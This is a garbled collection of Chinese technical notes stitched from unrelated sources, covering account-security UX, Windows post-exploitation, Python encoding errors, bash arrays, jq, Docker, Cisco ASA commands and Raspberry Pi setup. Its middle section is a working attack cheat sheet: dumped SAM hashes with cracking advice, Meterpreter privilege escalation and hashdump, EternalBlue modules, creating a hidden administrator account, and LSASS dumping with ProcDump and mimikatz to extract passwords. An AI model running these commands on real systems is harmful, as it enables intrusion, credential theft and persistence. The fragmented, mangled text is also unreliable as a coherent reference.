在账户安全的问题上,绝不能因为所谓的操作流畅性就降低安全标准。尤其是对于账户安全要求很高的产品,宁可让用户多做几步验证,最大程度地确保验证的准确性。
在交互上,用户会存在操作负担与认知负担,减少认知负担的优先级理应高于减少操作负担。如果因为减少操作负担,造成了账户安全问题,极大地增加了用户的认知负担,是非常得不偿失的行为。
#只是一级域名“abc.com” 跳转到www.abc.com去。
Administrator:500:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
Administrator:500:NO PASSWORD*********************:0CB6948805F797BF2A82807973B89537:::
每个字段的含义: 用户名:唯一安全ID:LM_HASH :NTLM_HASH
这串值就是LM_HASH,通过google “lm hash crack” 尝试破解
01FC5A6BE7BC6929AAD3B435B51404EE
0x02 Meterpreter 命令行工具
通过google搜索 “Metasploit工具Meterpreter的命令速查表”对反弹shell进行利用
其中比较常用的命令:
getuid 查看当前用户
getsystem 获取系统权限
shell 打开shell或者cmd
run hashdump 把sam数据库dump
0x03 常用payloaduse windows/meterpreter/reverse_tcp
use auxiliary/scanner/smb/pipe_auditorms17-010 payload:use exploit/windows/smb/ms17_010_eternalblueuse exploit/windows/smb/ms17_010_psexec0x04 ms17-010漏洞利用使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程MSF下ms17_010_psexec模块使用技巧Meterpreter提权详解
0x05 windows修改用户密码技巧
因为中文的windwos系统,在Meterpreter 会显示乱码,在进行net user操作出现报错
比如 NET HELPMSG 2245 表示密码长度不够规格,不够复杂比如 NET HELPMSG 3783 表示没有这个组或者用户net user administrator abc123 //修改administrator的密码net user test v5est0r /add //增加新用户 net localgroup administrators test /add //并且加入管理员组
0x06 获取system权限,对管理员密码获取
利用Meterpreter upload 上传 ProcDump 对系统的LSASS进程内存文件导出,命令如下Procdump.exe -accepteula -ma lsass.exe lsass.dmp导出后,利用Meterpreter download 将 lsass.dmp 文件下载到本地最后运行mimikatz,进行破解mimikatz # sekurlsa::minidump lsass.dmpmimikatz # sekurlsa::logonPasswords fullMeterpreter 加载mimikatz直接进行破解load mimikatz
help mimikatz
mimikatz_command -f privilege::debug mimikatz_command -f privilege::security mimikatz_command -f sekurlsa::logonPasswords
UnicodeDecodeError: 'utf8' codec can't decode byte 0xb5 in position 2: invalid start byte UnicodeDecodeError: 'ascii' codec can't decode byte 0xb5 in position 2: ordinal not in range(128) 通过下面代码,制造错误 >>> a='as的' >>> print a as的 >>> print a.decode('utf-8') >>> print a.decode('ascii') >>> print a.decode('gbk') >>> print a.decode('gb2312') >>> print a.decode('cp936') -
a = "my name" ✘ 这样是不能赋值成功的,并且提示“-bash: a: command not found” a="name" ✔ array[0] = "hello" ✘ array[0]="hello" ✔
echo $a array[0]=$a
output="i am a boy" 这个变量赋值给array的时候会进行分割 array=($output) 最后,变成: array[0]="i" array[1]="am" array[2]="a" array[3]="boy" 要使"i am a boy"存入array后保持完整,可以用下面的方法: array[0]=$output array=([0]=$output)
0x04 jq调试工具
--raw-input
/ -R
:--slurp
,则整个输入将作为单个长字符串传递给过滤器。--raw-output
/ -r
: 解析后的字符串去引号0x05 curl只输出json数据这样会输出http头部信息
docker logs
命令:tail -f
类似,能够持续打印输出。docker inspect
查看。ps -fe
查看。其中1号进程就是启动命令。Resource Current Peak Limit Denied Context SSH 1 2 5 0 System ASDM 0 1 30 0 System Syslogs [rate] 124 12661 N/A 0 System Conns 19340 19504 100000 0 System Xlates 13410 13531 N/A 0 System Hosts 4977 4977 N/A 0 System Conns [rate] 73 729 N/A 0 System Inspects [rate] 29 728 N/A 0 System Routes 7 10 unlimited 0 System登录防火墙,并且在xshell等终端把缓冲设置到最大值200000
查看源IP地址,这里得出的总数值 约等于 show resouce usage 的 conns 当前值 cat conn.txt | awk '{print $5}' | awk '{FS = ":"}; {print $1}' | sort -n | uniq -c | sort -nr | head -10
查看目的IP地址 cat conn.txt | awk '{print $3}' | awk '{FS = ":"}; {print $1}' | sort -n | uniq -c | sort -nr | head -10 查看单个IP的连接数 show local-host 172.16.5.163 brief 清除所有连接 clear local all 如果需要快速将问题机器从网络中取出,您可以执行以下操作: shun xxx.xxx.xxx.xxx 要扭转这种情况: no shun xxx.xxx.xxx.xxx
dtoverlay=pi3-miniuart-bt
dwc_otg.lpm_enable=0 console=tty1 console=serial0,115200 root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait
(原:dwc_otg.lpm_enable=0 console=serial0,115200 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait quiet init=/usr/lib/raspi-config/init_resize.sh quiet splash plymouth.ignore-serial-consoles)
chmod # 更改文件或者目录权限 二进制设置 644 --> 110 100 100 --> rw- r-- r-- 755 --> 111 101 101 --> rwx r-x r-x (八进制 - 二进制) (二进制 - 实际含义) 字符设置 +---------+-------+-----+ | u user | | | |---------| + | r | | g group |-------|-----| |---------| - | w | | o other |-------|-----| |---------| = | x | | a all | | | +---------+-------+-----+0x02 认识进程权限